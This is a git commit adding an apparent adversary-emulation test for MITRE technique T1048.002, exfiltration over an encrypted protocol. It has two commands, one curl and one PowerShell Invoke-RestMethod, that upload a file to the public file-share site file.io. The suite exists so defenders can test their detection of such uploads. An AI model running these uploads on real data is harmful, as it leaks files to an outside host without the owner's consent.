Implemented initial test for T1048.002 on Linux

This commit is contained in:
Daniel Danho
2021-11-17 11:47:00 +01:00
parent 22dd2fba1b
commit 447d5fc601
2 changed files with 49 additions and 0 deletions
+48
View File
@@ -0,0 +1,48 @@
---
attack_technique: T1048.002
display_name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
atomic_tests:
- name: Exfiltrate data HTTPS using curl
description: |
Exfiltrate data HTTPS using curl to file share site file.io
supported_platforms:
- windows
- macos
- linux
input_arguments:
input_file:
description: Test file to upload
type: Path
default: PathToAtomicsFolder/T1048.002/files/artifact
executor:
name: bash
elevation_required: false
command: |
curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
- name: Exfiltrate data HTTPS using Invoke-RestMethod
description: |
Exfiltrate data HTTPS using Invoke-RestMethod to file share site file.io
supported_platforms:
- windows
- linux
input_arguments:
input_file:
description: Test file to upload
type: Path
default: PathToAtomicsFolder/T1048.002/files/artifact
executor:
name: powershell
elevation_required: false
command: |-
$form = @{ file = Get-item -Path '(#{input_file})'; content_type = 'txt/plain'; autoDelete = 'true'; maxDownloads = '1' }
Invoke-RestMethod -Uri https://file.io -Method Post -Form $form
+1
View File
@@ -0,0 +1 @@
T1048.002